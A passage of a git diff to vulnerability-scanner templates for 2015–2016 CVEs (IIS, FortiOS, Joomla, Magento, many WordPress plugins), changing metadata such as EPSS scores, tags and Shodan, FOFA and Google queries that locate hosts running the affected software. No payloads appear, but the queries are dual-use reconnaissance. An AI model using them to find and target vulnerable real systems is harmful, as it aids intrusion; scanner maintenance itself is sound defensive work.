b/http/cves/2015/CVE-2015-1635.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: microsoft product: windows_7 - shodan-query: '"Microsoft-IIS" "2015"' + shodan-query: + - '"Microsoft-IIS" "2015"' + - '"microsoft-iis" "2015"' + - cpe:"cpe:2.3:o:microsoft:windows_7" tags: cve,cve2015,kev,microsoft,iis,rce http: diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 4023c545ce..320e3da092 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -21,14 +21,20 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57435 + epss-percentile: 0.58077 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2015,cve,xss,fortigates,intrusive,fortinet http: diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml index 63f8969bfe..4b276bd3a4 100644 --- a/http/cves/2015/CVE-2015-20067.yaml +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -29,7 +29,7 @@ info: product: wp_attachment_export framework: wordpress google-query: inurl:"/wp-content/plugins/wp-attachment-export/" - tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export + tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index bd3ab9b0c6..123d364661 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -27,7 +27,9 @@ info: vendor: magmi_project product: magmi framework: magento_server - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server http: diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index cf6695e912..654b138e9e 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -28,7 +28,9 @@ info: vendor: magmi_project product: magmi framework: magento_server - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server http: diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 54b047868a..82e71b65c9 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -17,15 +17,17 @@ info: cvss-score: 9.8 cve-id: CVE-2015-2794 cwe-id: CWE-264 - epss-score: 0.97458 - epss-percentile: 0.99953 + epss-score: 0.9743 + epss-percentile: 0.99939 cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dotnetnuke product: dotnetnuke - fofa-query: app="DotNetNuke" + fofa-query: + - app="DotNetNuke" + - app="dotnetnuke" tags: cve2015,cve,dotnetnuke,auth-bypass,install http: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index d44fdec3f1..1251a69481 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -24,11 +24,11 @@ info: epss-percentile: 0.69186 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: documentcloud - product: navis_documentcloud + product: "navis_documentcloud" framework: wordpress - google-query: inurl:"/wp-content/plugins/navis-documentcloud" + google-query: "inurl:\"/wp-content/plugins/navis-documentcloud\"" tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index fee2ae86dc..8ae12b1160 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: tp-link product: tl-wr841n_\(9.0\)_firmware - shodan-query: http.title:"TP-LINK" + shodan-query: + - http.title:"TP-LINK" + - http.title:"tp-link" fofa-query: title="tp-link" google-query: intitle:"tp-link" tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 68f3b923e4..e346766e9c 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - epss-score: 0.83225 - epss-percentile: 0.98353 + epss-score: 0.74714 + epss-percentile: 0.98145 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index f569a4a3d6..86fc569bd0 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91867 + epss-percentile: 0.92055 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index d8b1138b67..c4ce2d34c6 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -25,9 +25,9 @@ info: epss-percentile: 0.71383 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: church_admin_project - product: church_admin + max-request: 2 + vendor: "church_admin_project" + product: "church_admin" framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 5b94f1ef77..65298dc77b 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -19,10 +19,11 @@ info: epss-percentile: 0.97673 cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:* metadata: - vendor: aviary_image_editor_add-on_for_gravity_forms_project - product: aviary_image_editor_add-on_for_gravity_forms + max-request: 2 + vendor: "aviary_image_editor_add-on_for_gravity_forms_project" + product: "aviary_image_editor_add-on_for_gravity_forms" framework: wordpress - tags: cve,cve2015,packetstorm,intrusive,file-upload + tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 7fd1a2a4de..df3f64f1c3 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - epss-score: 0.02176 - epss-percentile: 0.88248 + epss-score: 0.01853 + epss-percentile: 0.88325 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index dd3b643cd6..2d5badcfb8 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -21,12 +21,11 @@ info: epss-percentile: 0.52637 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: sourceafrica_project + max-request: 2 + vendor: "sourceafrica_project" product: sourceafrica framework: wordpress tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project - flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 622cd844c2..098d5904c1 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -20,14 +20,17 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7297 cwe-id: CWE-89 - epss-score: 0.97564 - epss-percentile: 0.99999 + epss-score: 0.97553 + epss-percentile: 0.99997 cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.html:"joomla! - open source content management" + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve2015,cve,packetstorm,joomla,sqli variables: diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 422a417664..3de57a882e 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ibm product: tivoli_common_reporting - shodan-query: http.html:"IBM WebSphere Portal" + shodan-query: + - http.html:"IBM WebSphere Portal" + - http.html:"ibm websphere portal" fofa-query: body="ibm websphere portal" tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index f2bf1ff6ad..0a43cd3c2a 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.50407 + epss-percentile: 0.51315 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index c1fc09a7f9..39e49a1d8e 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -20,15 +20,17 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.61409 + epss-percentile: 0.6128 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kentico product: kentico_cms - google-query: intitle:"kentico database setup" - shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + shodan-query: + - cpe:"cpe:2.3:a:kentico:kentico_cms" + - http.title:"kentico database setup" fofa-query: title="kentico database setup" + google-query: intitle:"kentico database setup" tags: cve2015,cve,kentico,redirect,packetstorm http: diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 3d9d6e38f9..fbce9c9e13 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: atlassian product: confluence - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - cpe:"cpe:2.3:a:atlassian:confluence" + - http.component:"atlassian confluence" tags: cve2015,cve,edb,atlassian,confluence http: diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 080ab4b3b4..fad286f9a3 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.44236 cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpsymposiumpro - product: wp-symposium + product: "wp-symposium" framework: wordpress - google-query: inurl:"/wp-content/plugins/wp-symposium" + google-query: "inurl:\"/wp-content/plugins/wp-symposium\"" tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 471468b2a2..8f4d62034d 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: adobe product: dispatcher - shodan-query: http.component:"Adobe Experience Manager" + shodan-query: + - http.component:"Adobe Experience Manager" + - http.component:"adobe experience manager" tags: cve2016,cve,adobe,aem http: diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index f40b9e4e12..89ba5a6ffa 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -24,11 +24,11 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: admin-font-editor_project - product: admin-font-editor + max-request: 2 + vendor: "admin-font-editor_project" + product: "admin-font-editor" framework: wordpress - google-query: inurl:"/wp-content/plugins/admin-font-editor" + google-query: "inurl:\"/wp-content/plugins/admin-font-editor\"" tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 1a8d355c70..c9bd532243 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: ajax-random-post_project - product: ajax-random-post + max-request: 2 + vendor: "ajax-random-post_project" + product: "ajax-random-post" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index b2e7b90058..6e131a074e 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -20,13 +20,12 @@ info: epss-percentile: 0.41115 cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: anti-plagiarism_project - product: anti-plagiarism + max-request: 2 + vendor: "anti-plagiarism_project" + product: "anti-plagiarism" framework: wordpress - google-query: inurl:"/wp-content/plugins/anti-plagiarism" + google-query: "inurl:\"/wp-content/plugins/anti-plagiarism\"" tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 34e43a1d37..3340718a8b 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.4505 cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: defa-online-image-protector_project - product: defa-online-image-protector + max-request: 2 + vendor: "defa-online-image-protector_project" + product: "defa-online-image-protector" framework: wordpress - google-query: inurl:"/wp-content/plugins/defa-online-image-protector" + google-query: "inurl:\"/wp-content/plugins/defa-online-image-protector\"" tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 5d9ad2fd2a..e17b763428 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -22,13 +22,12 @@ info: epss-percentile: 0.38905 cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: e-search_project - product: e-search + max-request: 2 + vendor: "e-search_project" + product: "e-search" framework: wordpress - google-query: inurl:"/wp-content/plugins/e-search" + google-query: "inurl:\"/wp-content/plugins/e-search\"" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index fc0fa74dd2..80e66dec13 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -23,11 +23,11 @@ info: epss-percentile: 0.44874 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: e-search_project + max-request: 2 + vendor: "e-search_project" product: esearch framework: wordpress - google-query: inurl:"/wp-content/plugins/e-search" + google-query: "inurl:\"/wp-content/plugins/e-search\"" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 2cd03ee293..a58dfc6b01 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.44389 cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: cminds - product: tooltip_glossary + product: "tooltip_glossary" framework: wordpress - google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" + google-query: "inurl:\"/wp-content/plugins/enhanced-tooltipglossary\"" tags: cve2016,cve,wordpress,xss,wp-plugin,cminds - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 5dab7dd47a..bc896b113b 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -23,11 +23,11 @@ info: epss-percentile: 0.4984 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: designsandcode - product: forget_about_shortcode_buttons + product: "forget_about_shortcode_buttons" framework: wordpress - google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" + google-query: "inurl:\"/wp-content/plugins/forget-about-shortcode-buttons\"" tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 6dfae57ab4..20e96a956f 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -23,13 +23,12 @@ info: epss-percentile: 0.41177 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hdw-tube_project - product: hdw-tube + max-request: 2 + vendor: "hdw-tube_project" + product: "hdw-tube" framework: wordpress - google-query: inurl:"/wp-content/plugins/hdw-tube" + google-query: "inurl:\"/wp-content/plugins/hdw-tube\"" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 3200c40f7c..4c05d8b833 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -19,17 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hdw-tube_project - product: hdw-tube + max-request: 2 + vendor: "hdw-tube_project" + product: "hdw-tube" framework: wordpress - google-query: inurl:"/wp-content/plugins/hdw-tube" + google-query: "inurl:\"/wp-content/plugins/hdw-tube\"" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index d3d5d6f1ab..71b0189969 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -11,22 +11,22 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://wordpress.org/plugins/heat-trackr - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000136 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45775 + epss-percentile: 0.46028 cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: heat-trackr_project - product: heat-trackr + max-request: 2 + vendor: "heat-trackr_project" + product: "heat-trackr" framework: wordpress - google-query: inurl:"/wp-content/plugins/heat-trackr" + google-query: "inurl:\"/wp-content/plugins/heat-trackr\"" tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 3329ca918e..209d26fde6 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.44874 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hero-maps-pro_project - product: hero-maps-pro + max-request: 2 + vendor: "hero-maps-pro_project" + product: "hero-maps-pro" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 34be76c15a..02b6538cfa 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -24,11 +24,11 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: indexisto_project + max-request: 2 + vendor: "indexisto_project" product: indexisto framework: wordpress - google-query: inurl:"/wp-content/plugins/indexisto" + google-query: "inurl:\"/wp-content/plugins/indexisto\"" tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 2c6a1ed852..e517b9ff9a 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.44389 cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: infusionsoft_project + max-request: 2 + vendor: "infusionsoft_project" product: infusionsoft framework: wordpress - google-query: inurl:"/wp-content/plugins/infusionsoft" + google-query: "inurl:\"/wp-content/plugins/infusionsoft\"" tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index f854b63dfe..9d70a0c75e 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.45851 cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: new-year-firework_project - product: new-year-firework + max-request: 2 + vendor: "new-year-firework_project" + product: "new-year-firework" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 75ea4696c2..7e2a1e2e90 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -22,11 +22,11 @@ info: epss-percentile: 0.4984 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: page-layout-builder_project - product: page-layout-builder + max-request: 2 + vendor: "page-layout-builder_project" + product: "page-layout-builder" framework: wordpress - google-query: inurl:"/wp-content/plugins/page-layout-builder" + google-query: "inurl:\"/wp-content/plugins/page-layout-builder\"" tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 94c22a42c1..853a373c6a 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.41915 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: parsi-font_project - product: parsi-font + max-request: 2 + vendor: "parsi-font_project" + product: "parsi-font" framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 087d6bab4b..75ffcb78ca 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.48963 cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: photoxhibit_project + max-request: 2 + vendor: "photoxhibit_project" product: photoxhibit framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 5d2a4945d5..057c127a47 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -22,12 +22,11 @@ info: epss-percentile: 0.45775 cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: pondol-formmail_project - product: pondol-formmail + max-request: 2 + vendor: "pondol-formmail_project" + product: "pondol-formmail" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 4e63553106..b409ecb628 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: s3-video_project - product: s3-video + max-request: 2 + vendor: "s3-video_project" + product: "s3-video" framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index adae5de88a..b9128760ca 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: simpel-reserveren_project - product: simpel-reserveren + max-request: 2 + vendor: "simpel-reserveren_project" + product: "simpel-reserveren" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 98f49f7d73..247c5cd4b0 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -22,12 +22,11 @@ info: epss-percentile: 0.63018 cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: tidio-form_project - product: tidio-form + max-request: 2 + vendor: "tidio-form_project" + product: "tidio-form" framework: wordpress tags: 